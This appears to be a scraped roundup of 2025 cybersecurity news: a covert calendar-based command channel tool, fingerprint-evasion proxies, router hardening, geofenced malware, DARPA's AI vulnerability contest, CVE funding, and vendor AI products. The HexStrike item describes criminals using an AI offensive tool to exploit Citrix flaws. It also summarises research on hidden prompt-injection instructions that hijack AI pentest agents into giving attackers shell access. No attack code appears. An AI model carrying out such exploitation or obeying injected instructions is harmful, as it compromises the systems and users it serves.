AI + Quantum 2.0: The Double Disruption Security Leaders Can’t Ignore — The next cybersecurity crisis won’t come from AI or quantum alone—it will come from their convergence. As quantum breakthroughs accelerate and AI drives automation at scale, the attack surface for sensitive industries is expanding faster than most defenses can keep up. This panel brings together leading voices from research, government, and industry to unpack what Quantum 2.0 means for security, why quantum-safe cryptography and AI resilience must go hand-in-hand, and how decision-makers can start building trust and resilience before adversaries weaponize these technologies. 🔧 Cybersecurity Tools MeetC2 — It is a clever proof-of-concept C2 framework that uses Google Calendar—yes, the same calendar your team uses every day—as a hidden command channel between an operator and a compromised endpoint. By polling for events and embedding commands into calendar items via Google’s trusted APIs (oauth2.googleapis.com, www.googleapis.com), it shows how legitimate SaaS platforms can be repurposed for covert operations. Security teams can use MeetC2 in controlled purple-team exercises to sharpen detection logic around unusual calendar API usage, validate logging and telemetry effectiveness, and fine-tune safeguards against stealthy cloud-based C2 strategies. In short, it equips defenders with a lightweight, highly relevant testbed to simulate and proactively defend against next-gen adversarial tradecraft. thermoptic – It is an advanced HTTP proxy that cloaks low-level clients like curl to appear indistinguishable from a full Chrome/Chromium browser at the network fingerprinting layer. Modern WAFs and anti-bot systems increasingly rely on JA4+ signatures—tracking TLS, HTTP, TCP, and certificate fingerprints—to block scraping tools or detect when users switch from browsers to scripts. By routing requests through a containerized Chrome instance, thermoptic ensures fingerprints match real browsers byte-for-byte, even across multiple layers. For defenders, this is a powerful way to test detection pipelines against sophisticated evasion tactics, validate JA4+ logging visibility, and explore how adversaries might blend into legitimate browser traffic. For ethical researchers and red teams, thermoptic offers a realistic, open-source platform to simulate stealthy scraping or covert traffic—helping security teams move from theory to resilience in the fingerprinting arms race. Disclaimer: The tools featured here are provided strictly for educational and research purposes. They have not undergone full security audits, and their behavior may introduce risks if misused. Before experimenting, carefully review the source code, test only in controlled environments, and apply appropriate safeguards. Always ensure your usage aligns with ethical guidelines, legal requirements, and organizational policies. 🔒 Tip of the Week Lock Down Your Router Before Hackers Ever Get a Foot in the Door — Most people think of router security as just “change the password” or “disable UPnP.” But attackers are getting far more creative: from rerouting internet traffic through fake BGP paths, to hijacking cloud services that talk directly to your router. The best defense? A layered approach that closes those doors before compromise happens. Here are 3 advanced but practical moves you can start today: Protect Your Internet Route with RPKI Why it matters: Attackers sometimes hijack internet routes (BGP attacks) to spy on or reroute your traffic. Try this: Even if you’re not running a big enterprise, you can check if your ISP supports RPKI (Resource Public Key Infrastructure) using the free Is BGP Safe Yet? tool. If your provider isn’t secured, ask them about RPKI. Use Short-Lived Access Keys Instead of Static Passwords Why it matters: A single stolen router password can let attackers in for years. Try this: If your router supports it (OpenWRT, pfSense, MikroTik), set up SSH access with keys instead of passwords. For home or small office users, tools like YubiKey can generate one-time login tokens, so even if your PC is hacked, the router stays safe. Control Who Can Even Knock on the Door Why it matters: Most router compromises happen because attackers can reach the management port from the internet. Try this: Instead of leaving management open, use Single Packet Authorization (SPA) with a free tool like fwknop. It hides your router’s management ports until you send a secret “knock,” making your router invisible to scanners. Think of your router as the “front door to your digital house.” With these tools, you’re not just locking it — you’re making sure attackers don’t even know where the door is, and even if they do, the key changes every day. Conclusion That wraps up this week’s briefing, but the story never really ends. New exploits, new tactics, and new risks are already on the horizon—and we’ll be here to break them down for you. Until then, stay sharp, stay curious, and remember: one clear insight can make all the difference in stopping the next attack.
thehackernews.comSep 8, 2025extracted
They know where you are: Cybersecurity and the shadow world of geolocation
Tony Soprano knew. When one of his follow poker players in season 5, episode 4 of The Sopranos asks Tony how he likes his new Cadillac Escalade, the fictional mobster responds, “I love it. After I pulled out that global positioning [system].” OK, his language was a little more spicy than “system,” but the point is that Tony knew the dangers of being trackable. The rest of us might not have the same concerns Tony had about being findable just about anywhere, but we should all realize how dangerous geolocation can be, even for those of us who aren’t mobsters, and take measures to protect ourselves. The invisible attack vector Every smartphone ping, every business application check-in and every IP address lookup creates a geolocation signature that threat actors can weaponize. Cybercriminals use geolocation data to commit geographically targeted attacks, including phishing campaigns and flooding users with localized ads that carry potential malware. Geolocation enables surgical precision, turning location awareness into a weapon. What makes these attacks particularly insidious is their concept as "floating zero days.” Essentially, malware can remain completely benign until it reaches its intended geographic target. Malicious files drift through networks harmlessly until geolocation triggers activate them. Then, bam! The cyberattack strikes. Unfortunately, detection is nearly impossible until activation. Acronis Cyber Protect Cloud integrates data protection, cybersecurity, and endpoint management. Easily scale cyber protection services from a single platform – while efficiently running your MSP business Free 30-day Trial Stuxnet: The start of a revolution in cyberattacks The most notorious example of geolocation-based targeting, is, of course, Stuxnet, the reference case for geolocation attacks. The worm included a highly specialized malware payload that activated only when it encountered specific industrial control systems in Iranian nuclear facilities. Stuxnet ruined almost one-fifth of Iran's nuclear centrifuges, infected hundreds of thousands of computers and caused a thousand machines to physically fall apart. Attacks inspired by Stuxnet have come a long way in the last 15 years. Geofencing has evolved into a standard attack methodology. The ongoing Astaroth malware campaign exemplifies this evolution. The attack clearly targeted Brazil, where 91% of infected systems reside. The malware also successfully hit specific industries, with 27% of attacks striking manufacturing organizations and 18% victimizing the IT sector. Geolocation-based attacks are hard to catch with traditional defenses Why is geolocation data so effective as attack fuel? It supercharges social engineering by enabling hyper-personalized attacks. The SideWinder APT group demonstrates this technique masterfully, using spear phishing emails paired with geofenced payloads to ensure that only victims in specific countries, namely Bangladesh, Pakistan and Sri Lanka, receive malicious content. Geolocation plays a pivotal role in cybersecurity defense by identifying unusual patterns of login attempts from geographically disparate locations and flagging them as potential account takeover attempts. But cybercriminals can sneak past that defense by manipulating location data to establish patterns of "normal" behavior before launching attacks. Managed service providers (MSPs) and IT departments often assume virtual private networks (VPNs), anonymization and encryption provide adequate protection against geolocation-based attacks. Those measures are helpful, even necessary. But they’re not enough. Sophisticated threat actors adapt quickly, using botnets to sneak malicious activity around common methods of defense. Advanced persistent threat (APT) groups render traditional defenses ineffective by maintaining infrastructure that appears geographically distributed. Behind the scenes, threat groups can coordinate attacks through encrypted channels. Mitigation strategies for the location-aware threat landscape But MSPs and IT professionals aren’t helpless in defending against geolocation-enabled attacks. They need a multilayered approach that goes beyond traditional perimeter security. Organizations can protect themselves by: Implementing robust endpoint detection systems that monitor for activity from strange locations while maintaining operational flexibility to reduce susceptibility to cybercriminals’ trickery. Deploying decoy systems with fabricated location data to mislead attackers and gather intelligence on their targeting criteria and methodologies. Developing baseline location patterns for users and systems, enabling rapid detection of anomalous geographic activities that may indicate compromise or attack preparation. Treating all location-based authentication and authorization decisions as potentially compromised, requiring multiple verification factors beyond geographic position. The future of location-based cyberattacks The danger from geolocation-enabled attacks is going to get worse, not better. As internet of things (IoT) deployments expand and edge computing proliferates, the attack surface for geolocation-based threats will only grow. The convergence of artificial intelligence with geolocation data promises even more sophisticated attack methodologies. Machine learning algorithms can identify optimal timing and targeting for location-based attacks, while deepfake technology could generate convincing local context for social engineering campaigns. That’s why organizations have to understand that in today's threat landscape, location intelligence represents both a powerful defensive capability and a critical vulnerability. Investments in strengthening endpoint protection are a must, as is beefing-up authentication and authorization. Organizations don’t have to go full Tony Soprano in their geolocation systems, but they do need to understand the threats related to geolocation and how to minimize them. About TRU The Acronis Threat Research Unit (TRU) is a team of cybersecurity experts specializing in threat intelligence, AI and risk management. The TRU team researches emerging threats, provides security insights, and supports IT teams with guidelines, incident response and educational workshops. Sponsored and written by Acronis.
bleepingcomputer.comSep 3, 2025extracted
Threat Actors Weaponize HexStrike AI to Exploit Citrix Flaws Within a Week of Disclosure
Threat actors are attempting to leverage a newly released artificial intelligence (AI) offensive security tool called HexStrike AI to exploit recently disclosed security flaws. HexStrike AI, according to its website, is pitched as an AI‑driven security platform to automate reconnaissance and vulnerability discovery with an aim to accelerate authorized red teaming operations, bug bounty hunting, and capture the flag (CTF) challenges. Per information shared on its GitHub repository, the open-source platform integrates with over 150 security tools to facilitate network reconnaissance, web application security testing, reverse engineering, and cloud security. It also supports dozens of specialized AI agents that are fine-tuned for vulnerability intelligence, exploit development, attack chain discovery, and error handling. But according to a report from Check Point, threat actors are trying their hands on the tool to gain an adversarial advantage, attempting to weaponize the tool to exploit recently disclosed security vulnerabilities. "This marks a pivotal moment: a tool designed to strengthen defenses has been claimed to be rapidly repurposed into an engine for exploitation, crystallizing earlier concepts into a widely available platform driving real-world attacks," the cybersecurity company said. Discussions on darknet cybercrime forums show that threat actors claim to have successfully exploited the three security flaws that Citrix disclosed last week using HexStrike AI, and, in some cases, even flag seemingly vulnerable NetScaler instances that are then offered to other criminals for sale. Check Point said the malicious use of such tools has major implications for cybersecurity, not only shrinking the window between public disclosure and mass exploitation, but also helping parallelize the automation of exploitation efforts. What's more, it cuts down the human effort and allows for automatically retrying failed exploitation attempts until they become successful, which the cybersecurity company said increases the "overall exploitation yield." "The immediate priority is clear: patch and harden affected systems," it added. "Hexstrike AI represents a broader paradigm shift, where AI orchestration will increasingly be used to weaponize vulnerabilities quickly and at scale." HexStrike AI isn't the first red-teaming and defender-focused tool to be misused by cybercriminals, and it certainly won't be the last. Just last week, Sophos revealed how threat actors weaponized an open-source endpoint monitoring and digital forensic tool called Velociraptor in an attack designed to drop additional payloads. The disclosure comes as two researchers from Alias Robotics and Oracle Corporation said in a newly published study that AI-powered cybersecurity agents like PentestGPT carry heightened prompt injection risks, effectively turning security tools into cyber weapons via hidden instructions. "The hunter becomes the hunted, the security tool becomes an attack vector, and what started as a penetration test ends with the attacker gaining shell access to the tester's infrastructure," researchers Víctor Mayoral-Vilches and Per Mannermaa Rynning said. "Current LLM-based security agents are fundamentally unsafe for deployment in adversarial environments without comprehensive defensive measures."
thehackernews.comSep 3, 2025extracted
Trend Micro improves SIEM performance with agentic AI
Trend Micro improves SIEM performance with agentic AI Trend Micro announced new agentic AI technology designed to solve the traditional pain points associated with Security Information and Event Management (SIEM). When combined with Trend’s digital twin capabilities it will help to transform security operations by proactively mitigating security risks. “As the cybersecurity stack increasingly becomes AI driven, the security data layer must evolve to support data-hungry agentic capabilities, including infusing agentic AI into core SIEM functions. Trend Vision One Agentic SIEM enters the SIEM market at a pivotal time, leveraging Agentic AI from the ground up to drive speed, performance, and a new level of risk-driven, contextual insights to rapidly mitigate cyber threat activity,” said Dave Gruber, Principal Cybersecurity Analyst at ESG. SIEM technology has been around for decades, but users face longstanding issues including cost, complexity, alert overload, and passive data lakes. In addition, traditional SIEMs rely on manual configuration and static parsers, which can’t keep up with the pace or variety of modern data sources. Trend’s Agentic SIEM was built from the ground up to address these challenges, leveraging the next generation of AI technology to proactively think, learn, and act. Acting independently, it cuts through alert noise, reducing workloads for overburdened security teams. What used to take weeks of setup is now automated by Agentic AI — it learns, maps, and optimizes data as it goes. Customers using Trend’s agentic SIEM will improve their security and efficiency with: 900+ data sources supported since launch on August 1 to improve visibility, context and threat detection Three-day onboarding for new log types—with reduction to three hours by 2026—to reduce the risk of the unknown in enterprise environments Trend’s proven XDR capabilities, with six native security sensors across endpoint, cloud, email, networks, servers, and identity. Agentic SIEM brings in third-party telemetry to provide a full view of the environment. Up to seven years of archival data retention and two years of analytic retention for enhanced detection, threat hunting, and compliance support. “Agentic SIEM is a major stepping stone to our long-term vision for full, AI-driven SecOps. It’s a future in which security teams will have more time to work on strategic tasks, safe in the knowledge that our agentic AI has their backs. With this launch, Trend is once again laying down a marker for cybersecurity innovation and global market leadership,” said Rachel Jin, Chief Enterprise Platform Officer at Trend Micro. Agentic SIEM has the potential to supercharge SIEM across a variety of use cases: Threat detection and response: Replaces manual log and alert monitoring with autonomous data analysis, anomaly detection and response—reducing time to detect and mitigate threats. Compliance support: Combines extended data retention with the ability to search archival logs—meeting audit and regulatory requirements with ease. Incident investigation: Replaces manual, time-consuming and error-prone investigations with automated data correlation from multiple sources, to accelerate the process and enhance accuracy. The potential to combine Agentic SIEM with Trend’s latest digital twin technology is a revolutionary opportunity for customers. Doing so enables proactive mitigation of security risks impacting these virtual models—surfacing intelligence to enhance resilience, compliance, and competitive advantages. This presents major opportunities in highly sensitive use cases including healthcare, supply chain security, predictive maintenance, and smart building management.
helpnetsecurity.comAug 12, 2025extracted
DARPA announces $4 million winner of AI code review competition at DEF CON
DARPA announces $4 million winner of AI code review competition at DEF CON LAS VEGAS — The U.S. Defense Department announced the winner of its two-year competition among researchers to create the best artificial intelligence systems that can find and fix vulnerabilities. The winner announced on Friday at the DEF CON cybersecurity conference, known as Team Atlanta, is composed of tech experts from Georgia Tech, Samsung Research, the Korea Advanced Institute of Science & Technology (KAIST) and the Pohang University of Science and Technology (POSTECH). “The world is different because the AI Cyber Challenge (AIxCC) has fundamentally changed our understanding of what is possible in terms of automatically finding, but more importantly, fixing vulnerabilities in software,” said AIxCC Program Manager Andrew Carney. The two-year AIxCC competition was run through the Defense Advanced Research Projects Agency (DARPA) and pitted dozens of teams against each other in a contest to see who could use AI to create systems that can automatically secure the critical code that undergirds prominent systems used across the globe. The seven semifinal winners were announced at last year’s DEF CON and were awarded $2 million each to continue their work into the final round. Taesoo Kim, a professor at Georgia Tech and leader of Team Atlanta, said his group was a mix of security researchers like himself, as well as engineers and programmers. Kim imagined a future where developers effectively have an AI agent with them that can serve as a de-facto security expert — offering proactive advice and feedback on code from its conception. Trail of Bits, a New York City-based cybersecurity firm, won second place, and Theori, comprising AI researchers and security professionals in the U.S. and South Korea, won third place. The top three teams will receive $4 million, $3 million and $1.5 million, respectively. Kim said his team decided to donate a large portion of their winnings back to Georgia Tech so that they can continue to perform their research. Carney lauded all of the participants for successfully demonstrating that novel autonomous systems using AI could competently find and patch vulnerabilities. “Quality patching is a crucial accomplishment that demonstrates the value of combining AI with other cyber defense techniques,” Carney said. “What’s more, we see evidence that the process of a cyber reasoning system finding a vulnerability may empower patch development in situations where other code synthesis techniques struggle.” DARPA and other U.S. government agencies also added on $1.4 million in additional prizes for the other teams that competed in the final round in an effort to help them make their systems usable for real-world critical infrastructure organizations. Carney said the $1.4 million will be made available to teams that demonstrate they’ve actually deployed their technology into critical infrastructure projects. Traditional Team Atlanta The final competition saw teams attempt to find and generate patches for synthetic vulnerabilities buried in 54 million lines of code. Teams were judged based on the ability of their systems to create patches for the bugs that were found. DARPA officials said Team Atlanta “performed best at finding and proving vulnerabilities, generating patches, pairing vulnerabilities and patches, and scoring with the highest rate of accurate and quality submissions.” Carney was tight-lipped on specifically why Team Atlanta won the competition, telling Recorded Future News that more information would be released at a later date explaining the decision. Kim said his team’s system married more traditional threat hunting tools with AI, somewhat separating it from other teams that leaned more heavily on artificial intelligence. “There is a huge value in traditional software analysis tools that we’ve been working with over the last decade,” he said. “AI can leverage those tools in terms of navigating the source code. AI increases the bar significantly for the team, and giving up on traditional tools is not the way to go.” Overall, competitors found 54 unique synthetic vulnerabilities and were able to patch 43 of them — representing 77% of the synthetic vulnerabilities introduced. In the semifinal competition last year, just 37% were found. Leveraging it for healthcare The AIxCC competition saw the Defense Department partner with the Health and Human Services Department (HHS) as well as AI companies like Anthropic, Google and OpenAI — each of which provided technical support and $350,000 in large language model credits. Microsoft and the Linux Foundation’s Open Source Security Foundation also provided assistance to the challenge’s organizers. DARPA Director Stephen Winchell told the DEF CON audience that they are releasing four of the seven cyber reason systems immediately, making the tools available for cyber defenders. The other three will be released in the coming weeks. “Finding vulnerabilities and patching codebases using current methods is slow, expensive, and depends on a limited workforce – especially as adversaries use AI to amplify their exploits,” Winchell said. “AIxCC-developed technology will give defenders a much-needed edge in identifying and patching vulnerabilities at speed and scale.” HHS officials said they are eager to deploy the systems in an effort to immediately address vulnerabilities that impact the healthcare system. Advanced Research Projects Agency for Health (ARPA-H) senior official Jennifer Roberts added that she was most excited by the results of the competition because she believes the tools can “move us toward a reality where ransomware attacks across hospitals become a thing of the past.” Jim O'Neill, deputy HHS secretary, told DEF CON that last year’s ransomware attack on healthcare giant Ascension likely cost up to $1.6 billion “in operational paralysis, lost revenue and recovery efforts.” DARPA said it plans to release other data from the competition to promote the use of AI as a pivotal tool for vulnerability discovery in other critical infrastructure industries. AI code review has become a major effort by a number of tech giants, with both Microsoft and Google announcing recent initiatives that have borne fruit in terms of discovering bugs. Kim noted to reporters that the cybersecurity community may benefit most by combining many of the competitors’ systems to leverage the best aspects of each one. “If we can combine all these AI agents together, we’re going to see a ridiculously high performing system,” he said. “We can design an even more powerful one.” Jonathan Greig is a Breaking News Reporter at Recorded Future News. Jonathan has worked across the globe as a journalist since 2014. Before moving back to New York City, he worked for news outlets in South Africa, Jordan and Cambodia. He previously covered cybersecurity at ZDNet and TechRepublic.
therecord.mediaAug 8, 2025extracted
CISA pledges to continue backing CVE Program after April funding fiasco
CISA pledges to continue backing CVE Program after April funding fiasco LAS VEGAS — Federal officials pledged Thursday to continue their stewardship of the CVE Program — which catalogs all public cybersecurity vulnerabilities — after a funding dispute in April led to industry concern about the effort’s future. At the Black Hat cybersecurity conference in Las Vegas, two leaders from the Cybersecurity and Infrastructure Security Agency (CISA) were asked about the CVE Program’s future — which was thrown into doubt amid a flurry of high-profile cybersecurity contract cancellations following President Donald Trump’s inauguration. Chris Butera, acting executive assistant director for the cybersecurity division at CISA, told the audience that the agency is heavily invested in the CVE program, will "continue to fund” it and plans to “improve” it. “It is really central to all of our cybersecurity operations,” he said, using the recent security incident affecting Microsoft’s SharePoint product as an example. “We have to have that exact, unique way to identify the specific vulnerability that we're talking about. In the SharePoint case, there were four different CVEs involved, so we had to have that specific unique identifier attached to the vulnerabilities,” Butera said. “We were all talking about the same thing, and without the CVE program, we don't have that.” From left, CISA's Chris Butera and Bob Costello speak at the 2025 Black Hat conference in Las Vegas with Frank Cilluffo of the McCrary Institute. Image: Jonathan Greig / Recorded Future News The program is a pillar of the cybersecurity system dating back to 1999 that countless cybersecurity vendors, governments and critical infrastructure organizations rely on for vulnerability identification. CVE stands for Common Vulnerabilities and Exposures. The organization that runs the program sent out an urgent alert on April 15 warning that its contract with the federal government was not being renewed and that once it lapsed, no new CVEs would be added to the program and the program’s website would eventually cease. CISA initially acknowledged that the contract was lapsing and said it was “working to mitigate impact and to maintain CVE services on which global stakeholders rely.” The incident caused outrage in the cybersecurity community and one day later, CISA decided to extend the CVE program contract for 11 months. The about-face did not stop pioneering cybersecurity experts from airing desires for the CVE program to be removed from U.S. government control. The European Union launched a separate vulnerability database in May. Several CVE Program board members banded together to create the CVE Foundation, which said it “vehemently believes the best path forward to preserve the critical service of the CVE Program is to transition it to a nonprofit entity with true international coordination, rigorous and transparent governance, and multiple funding sources from public, private, and nonprofit organizations.” The organization added that software, hardware and services are not produced, maintained or consumed in a single jurisdiction, so it “must be a shared and global responsibility, and not one owned or controlled by a single nation.” When asked on Thursday what changed between now and April, Butera told Recorded Future News that “there was no funding issue, but rather a contract administration issue that was resolved prior to a contract lapse.” In response to questions about the CVE Foundation and calls for funding or control outside of U.S. government hands, Butera said CISA is “committed to fostering inclusivity, active participation, and meaningful collaboration between the private sector and international governments to deliver the requisite stability and innovation to the CVE Program.” “And we are committed to achieving these goals together,” he added. During the Black Hat talk, Butera spoke at length about how the CVE program has grown significantly in the last five years, eclipsing more than 40,000 vulnerability records in a single year. He noted that the figure is likely to increase every year. “That program is really foundational, both to our tactical operational work but also to some of our strategic work as well. It's really the basis and foundation for the whole vulnerability and cybersecurity ecosystem,” he said. He pledged to push for more robust vulnerability records that contained more information on bugs, potential patches and more. Information-sharing reauthorization and AI Butera and Bob Costello, chief information officer for CISA, were speaking in place of CISA acting Director Madhu Gottumukkala, who had to back out of attending on Monday due to a personal matter. Both expressed hope that Congress will pass a reauthorization bill for a pivotal cyber information sharing program and spoke at length about ways artificial intelligence will help defenders sort through troves of incident data. Butera said the Joint Cyber Defense Collaborative (JCDC), which allows private sector companies to share threat information and more with government agencies, now has an AI security group that meets regularly and has several different initiatives. “They released a playbook for how to respond to AI incidents last year, in coordination with these industry groups, and they continue to work together with industry to try to make sure that we're releasing secure [AI] systems,” he said. Costello added that CISA is planning to release new services that will make it easier for organizations to sign up for their cyber hygiene services. Both walked the audience through several concerns they have, including the evolving trend of cybercriminals chaining vulnerabilities together for initial access to networks. Costello said that he is also working on CISA’s “technical debt” — the term for updating tech implemented quickly but with shortcomings — and plans to fully migrate the organization to the cloud by September 30. Butera also warned that the agency is still seeing organizations connect sensitive systems directly to the internet, exposing them to a variety of dangers. CISA has released several advisories highlighting the danger of exposing devices to the internet, particularly those connected to industrial control systems. “We are thankful for Congress to give us an administrative subpoena authority that we can actually now use to figure out who owns some of those control systems that are connected the internet, and with help from the ISPs, gain access to who that entity is, and then contact that entity and have them try to remove that from the Internet,” Butera said. “Today, we've contacted over 3,000 entities, and we've had over an 80% success rate in getting some of those devices removed from the internet. So we think that is really important, and one way to reduce some attack surface.” Jonathan Greig is a Breaking News Reporter at Recorded Future News. Jonathan has worked across the globe as a journalist since 2014. Before moving back to New York City, he worked for news outlets in South Africa, Jordan and Cambodia. He previously covered cybersecurity at ZDNet and TechRepublic.
therecord.mediaAug 8, 2025extracted
SpyCloud adds AI Insights to Investigations, speeds insider and identity threat detection
SpyCloud adds AI Insights to Investigations, speeds insider and identity threat detection SpyCloud has introduced enhancements to its SaaS Investigations solution, integrating advanced AI-powered insights that mirror the tradecraft of SpyCloud’s seasoned investigators. Building on the foundation of its IDLink identity analytics, this new capability further automates and accelerates complex cybercrime investigations, empowering security operations, cyber threat intelligence, and fraud and risk prevention teams to uncover critical findings faster than ever to combat evolving identity threats, including employment fraud. SpyCloud Investigations with AI Insights marks a pivotal advancement, extending the capabilities of IDLink’s automated digital identity correlation. Where IDLink excels at expanding the scope of interconnected digital identities, the new AI capability makes the tradecraft and thought process of a veteran investigator accessible to analysts of every experience level. Within seconds, it pulls together identity exposure data across third-party breaches, malware infections, and successful phishes, as well as patterns of behavior on infostealer-infected devices to generate actionable finished intelligence that points to potential insider threats – malicious, negligent, and compromised. “SpyCloud Investigations with IDLink and AI Insights offers unparalleled visibility and depth,” said Jacques Chitarra, Samsonite’s Senior Director of Global Security and Privacy. “Insider threat reports now populate in seconds, eliminating the need to chase down endless digital breadcrumbs. This acceleration allows our team to stay focused on the outcomes that matter most.” According to a recent survey of CISOs and security practitioners conducted by SpyCloud, 56% of organizations experienced an insider threat incident in the past year. One example is the surge in fraudulent North Korean IT workers infiltrating enterprises – a scheme now impacting nearly every Fortune 500 company. These individuals use stolen or fabricated identity data to gain employment under false pretenses, effectively becoming insider threats from day one. SpyCloud Investigations with AI Insights helps security teams identify these threats faster by connecting identity exposure data with suspicious access behaviors, enabling earlier detection and response with fewer resources. “By embedding AI into SpyCloud Investigations, we’re empowering security teams to move from reactive investigation to proactive detection,” said Jason Lancaster, SpyCloud’s SVP of Investigations. “This isn’t just faster analysis – it’s finished intelligence that mirrors the intuition of seasoned analysts, surfacing hidden identity risk and building narratives investigators can act on and share with confidence. Our customers can now uncover insider threats with greater speed and clarity, closing gaps that adversaries have long exploited and reshaping how identity threats are mitigated.” SpyCloud Investigations with AI Insights provides: Enhanced threat analysis: AI Insights, built from SpyCloud’s investigative methodologies, analyzes historical breach, malware, and phishing data, combined with industry-veteran tradecraft, to identify suspicious behaviors and insider threats, allowing organizations to strengthen investigations in seconds. Suspicious pattern detection: Beyond direct correlations, SpyCloud’s AI pinpoints unusual or suspicious identity relationships and patterns that indicate insider threats, sophisticated account takeover attempts, or new forms of financial fraud, often undetected in other investigation solutions. Actionable insider threat signals: By leveraging AI to process and contextualize massive amounts of data, investigators can more rapidly and accurately correlate and attribute exposed identity data to a malicious, negligent, or unwitting insider threat with signals that teams can act on. Optimized investigative workflows: AI-driven summaries with clearly defined signals of risk streamline and shorten investigative processes, enabling analysts of any level of expertise, and regardless of the complexity of an investigation, to focus on the most critical threats and maximize their impact quickly. “SpyCloud Investigations, now with AI Insights, is designed to think like an analyst – surfacing the right signals in seconds, not hours,” said Damon Fleury, SpyCloud’s Chief Product Officer. “By embedding decades of investigative tradecraft into the platform, we’re enabling analysts of any skill level to operate with greater confidence and precision while accelerating their investigations and gaining faster, clearer insights into identity and insider threats.”
helpnetsecurity.comAug 6, 2025extracted
Loading 3 more…